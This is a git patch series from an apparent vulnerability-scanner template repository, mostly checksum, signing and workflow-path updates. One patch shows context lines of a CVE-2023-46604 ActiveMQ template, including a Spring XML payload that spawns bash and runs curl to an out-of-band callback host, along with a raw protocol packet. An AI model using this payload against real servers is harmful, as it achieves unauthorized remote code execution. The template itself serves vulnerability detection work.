From 0c131b2eac88b33ac1d0059f790327224381deca Mon Sep 17 00:00:00 2001
From: mzack <marco.rivoli.nvh@gmail.com>
Date: Thu, 21 Mar 2024 02:57:08 +0100
Subject: [PATCH 1/6] fixing faulty template

---
 javascript/cves/2023/CVE-2023-46604.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml
index 40231ce6c3..e7326fd2cf 100644
--- a/javascript/cves/2023/CVE-2023-46604.yaml
+++ b/javascript/cves/2023/CVE-2023-46604.yaml
@@ -40,7 +40,7 @@ javascript:
       let b = m2.Buffer();
       let name=Host+':'+Port;
       let conn = m1.Open('tcp', name);
-      let randomvar = '{{randstr}}'
+      let randomvar = '{{randstr}}'.toLowerCase();
       var Base64={encode: btoa}
       exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
       packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"

From 6405d33af9f23be45dddecb8ba18bd4d9cf41225 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Fri, 22 Mar 2024 07:33:10 +0000
Subject: [PATCH 3/6] Auto Generated Templates Checksum [Fri Mar 22 07:33:10
 UTC 2024] :robot:

---
 templates-checksum.txt | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 1eb6877577..d127627215 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -5133,7 +5133,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3
 http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7
 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f
 http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057
-http/misconfiguration/installer/drupal-install.yaml:8935c0e57b3677226b50338b8495600390d3e8b0
+http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36
 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9
 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251
 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99
@@ -7992,7 +7992,7 @@ http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380
 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b
 javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0
 javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb
-javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8
+javascript/cves/2023/CVE-2023-46604.yaml:7fde2860cded498d346bfe3a70bdee06bc6b780d
 javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3
 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161
 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad
@@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
 ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
-templates-checksum.txt:128d6f230562518d7dd61144f475986ae8d2e63c
+templates-checksum.txt:9fd40bc7e1d2a108145497f32509e664af53af65
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4

From 5e1bb9d7d85824378d721f07c1fb01be1a848eb7 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Fri, 22 Mar 2024 07:34:51 +0000
Subject: [PATCH 4/6] Auto Template Signing [Fri Mar 22 07:34:51 UTC 2024]
 :robot:

---
 javascript/cves/2023/CVE-2023-46604.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml
index e7326fd2cf..926ccba63a 100644
--- a/javascript/cves/2023/CVE-2023-46604.yaml
+++ b/javascript/cves/2023/CVE-2023-46604.yaml
@@ -61,4 +61,4 @@ javascript:
           - 'contains(interactsh_protocol, "dns")'
           - 'contains(interactsh_request, response)'
         condition: and
-# digest: 4a0a004730450220072242f64d49392155c8bd39d873097b2d61c950543e6aed9e10de3504f6c99202210089c83d599670a33b43a312a55f6ef5dce55b3861aa538160fa40802c06d6a00f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c9d0d2f9b39ad03129d83fcc2561733c1ffdb8119572c0f222d529083466f7b1022100b6db80c8ccd45b35ec5ebafceefbf53d92b365fc01041ad991036346155950c4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file

From 08dc5c90c719016bdacd116a3228664310c5d5bc Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Fri, 22 Mar 2024 13:07:25 +0530
Subject: [PATCH 5/6] update-workflow

---
 workflows/default-application-workflow.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/workflows/default-application-workflow.yaml b/workflows/default-application-workflow.yaml
index 03b65efc24..42b418ab7f 100644
--- a/workflows/default-application-workflow.yaml
+++ b/workflows/default-application-workflow.yaml
@@ -4,6 +4,7 @@ info:
   name: Default Web Application Detection
   author: andydoering
   description: Detects default installations of web applications
+
 workflows:
   - template: http/technologies/apache/default-apache-test-all.yaml
 
@@ -23,7 +24,7 @@ workflows:
 
   - template: http/technologies/default-django-page.yaml
 
-  - template: http/exposures/files/drupal-install.yaml
+  - template: http/misconfiguration/installer/drupal-install.yaml
 
   - template: http/technologies/oracle/default-oracle-application-page.yaml
 

From c37769da01b0ac4def0c3779676b47367c6c4b8f Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Fri, 22 Mar 2024 07:41:50 +0000
Subject: [PATCH 6/6] Auto Generated Templates Checksum [Fri Mar 22 07:41:50
 UTC 2024] :robot:

---
 templates-checksum.txt | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index d127627215..05fe547af1 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -7992,7 +7992,7 @@ http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380
 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b
 javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0
 javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb
-javascript/cves/2023/CVE-2023-46604.yaml:7fde2860cded498d346bfe3a70bdee06bc6b780d
+javascript/cves/2023/CVE-2023-46604.yaml:ded5a8bcb92125c053b218e259931104983bd625
 javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3
 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161
 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad
@@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
 ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
-templates-checksum.txt:9fd40bc7e1d2a108145497f32509e664af53af65
+templates-checksum.txt:85f803445c04e3767bca7543b712f870fbe8bc26
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4
@@ -8215,7 +8215,7 @@ workflows/concrete-workflow.yaml:9ce74c7f22e588fe67965f30608d5b4c2b63b97b
 workflows/confluence-workflow.yaml:68fd7ea4f21d30bfb2898f6b714728dcf08c5fbc
 workflows/dahua-workflow.yaml:2e6e287ca5c83229a03cc790fca31962ca0a8a1a
 workflows/dedecms-workflow.yaml:c96c00339a55a8ede0578bdb8ae625b4b6d7e32d
-workflows/default-application-workflow.yaml:07fe2d7545f5768661550d63536b0fe61f4433bb
+workflows/default-application-workflow.yaml:df25752fc3cc808eaba4d365f2924744130db71a
 workflows/dell-idrac-workflow.yaml:40a2853262007c7904c0ca6ceeff8116d2694139
 workflows/dolibarr-workflow.yaml:36c2eaa9e3aabe24b61b95c7e451dae5f26939b5
 workflows/dotnetnuke-workflow.yaml:8e2578065d576a59c30a807fab1913ae5726a779